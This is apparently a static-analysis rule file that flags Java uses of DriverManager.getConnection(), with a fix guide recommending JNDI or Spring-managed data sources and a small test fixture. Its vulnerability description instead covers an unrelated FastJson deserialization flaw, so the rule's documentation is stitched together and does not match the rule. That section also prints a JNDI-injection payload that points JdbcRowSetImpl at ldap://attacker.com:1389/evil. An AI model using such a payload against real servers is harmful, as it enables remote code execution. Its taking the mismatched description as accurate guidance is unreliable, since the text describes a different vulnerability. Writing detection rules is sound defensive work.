desc(
	title_zh: "检测Java J2EE 使用DriverManager getConnection"
	title: "Check Java J2EE Usage of DriverManager getConnection"
	risk:"代码风格",
	level: info
	reference: <<<REFERENCE
https://docs.oracle.com/javase/8/docs/api/java/sql/DriverManager.html
REFERENCE
	desc: <<<DESC
### 漏洞描述

1. **漏洞原理**
   FastJson 是一个流行的 Java 库，用于将 Java 对象转换为 JSON 格式，以及从 JSON 解析为 Java 对象。在某些旧版本中，FastJson 存在反序列化漏洞。当应用程序使用 `JSON.parseObject()` 或 `JSON.parse()` 等方法处理来自不受信任来源的 JSON 数据时，如果 JSON 字符串中包含恶意构造的类型信息（`@type` 字段），FastJson 会尝试实例化并调用指定类的任意方法，从而导致远程代码执行。利用该漏洞，攻击者可以将恶意 payload 通过 JSON 数据发送给应用程序，触发任意代码在服务器上执行。

2. **触发场景**
   当应用程序使用了存在漏洞的 FastJson 版本（例如 1.2.24、1.2.47 等旧版本），并且接收并直接解析用户可控的 JSON 数据时，就可能触发该漏洞。

   **示例代码 (存在漏洞):**
   ```java
   import com.alibaba.fastjson.JSON;

   public class UnsafeFastjsonDemo {
       public static void main(String[] args) {
           String jsonString = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://attacker.com:1389/evil\",\"autoCommit\":true}";
           // 直接解析用户输入的JSON字符串
           Object obj = JSON.parse(jsonString);
           System.out.println(obj);
       }
   }
   ```
   攻击者可以构造包含恶意 `@type` 字段的 JSON 字符串，例如指向 JNDI Datasource 实现类，通过 LDAP 或 RMI 调用远程恶意类，最终导致代码执行。

   此外，即使升级到较新的版本，如果在配置中明确开启了 AutoType 或者使用了 `Feature.SupportAutoType`，或者在反序列化时指定了`ParserConfig.global.addAccept()`允许了危险类前缀，仍然可能存在风险。

3. **潜在影响**
   - **远程代码执行 (RCE):** 攻击者可以在目标服务器上执行任意代码，完全控制应用程序和服务器。
   - **数据泄露/篡改:** 通过执行任意代码，攻击者可以访问、窃取或修改数据库中的敏感数据。
   - **系统破坏:** 攻击者可能删除文件、关闭服务或进行其他恶意操作，导致系统瘫痪。
   - **内网渗透:** 利用受攻击的服务器作为跳板，攻击者可能进一步攻击内网的其他系统。
DESC
	rule_id: "219b8265-213b-474f-8a71-a86bfb3d3929"
	solution: <<<SOLUTION
### 修复建议

#### 1. 使用JNDI获取数据源
将数据库配置交由应用服务器或容器管理，通过JNDI查找并使用容器配置好的`DataSource`。

```java
// 修复代码示例：使用 JNDI 获取 DataSource
import javax.naming.InitialContext;
import javax.sql.DataSource;
import java.sql.Connection;

public class SomeDao {
    private static final String DATA_SOURCE_JNDI_NAME = "jdbc/mydb"; // 容器中配置的JNDI名称

    public void accessDatabase() {
        Connection conn = null;
        try {
            InitialContext ctx = new InitialContext();
            DataSource dataSource = (DataSource) ctx.lookup(DATA_SOURCE_JNDI_NAME);
            conn = dataSource.getConnection();
            // ... 数据库操作 ...
        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            if (conn != null) {
                try {
                    conn.close();
                } catch (Exception e) {
                    e.printStackTrace();
                }
            }
        }
    }
}
```

#### 2. 使用Spring等框架管理数据源
如果使用Spring框架，应通过Spring的依赖注入机制配置`DataSource` Bean，并在DAO层注入使用。

```java
// Spring配置示例 (applicationContext.xml 或 Java Config)
/*
<bean id="dataSource" class="org.apache.commons.dbcp2.BasicDataSource">
    <property name="driverClassName" value="com.mysql.cj.jdbc.Driver"/>
    <property name="url" value="jdbc:mysql://localhost:3306/mydb"/>
    <property name="username" value="user"/>
    <property name="password" value="password"/>
    <property name="initialSize" value="5"/>
    <property name="maxTotal" value="10"/>
</bean>

<bean id="someDao" class="com.example.SomeDao">
    <property name="dataSource" ref="dataSource"/>
</bean>
*/

// 修复代码示例：在DAO中注入使用 Spring 管理的 DataSource
import javax.sql.DataSource;
import java.sql.Connection;

public class SomeDao {
    private DataSource dataSource;

    public void setDataSource(DataSource dataSource) {
        this.dataSource = dataSource;
    }

    public void accessDatabase() {
        Connection conn = null;
        try {
            conn = dataSource.getConnection();
            // ... 数据库操作 ...
        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            if (conn != null) {
                try {
                    conn.close();
                } catch (Exception e) {
                    e.printStackTrace();
                }
            }
        }
    }
}
```

#### 3. 避免硬编码数据库连接信息
无论使用JNDI还是Spring管理，均应将数据库连接URL、用户名、密码等敏感信息从代码中移除，配置在应用服务器、properties文件或环境变量中，通过配置方式获取。
SOLUTION
)

DriverManager?{<typeName>?{have:'java.sql.DriverManager'}}.getConnection() as $get;
alert $get for {
	level: "info",
	message: "检测到Java项目中使用了DriverManager.getConnection()方法",
	title: "Unvalidated DriverManager getConnection Usage",
	title_zh: "未验证的DriverManager getConnection使用",
}

desc(
	lang:java
	alert_num:1
	"file://demo.java":<<<CODE
    import java.sql.Connection;
    import java.sql.DriverManager;
    import javax.servlet.http.HttpServlet;

    public class MyServlet extends HttpServlet {
        protected void doGet(javax.servlet.http.HttpServletRequest req, javax.servlet.http.HttpServletResponse resp) {
            try {
                // 直接用 DriverManager 获取连接（不推荐）
                Connection conn = DriverManager.getConnection(
                    "jdbc:mysql://localhost:3306/mydb", "user", "password"
                );
                // ... 业务逻辑 ...
                conn.close();
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }
CODE
)
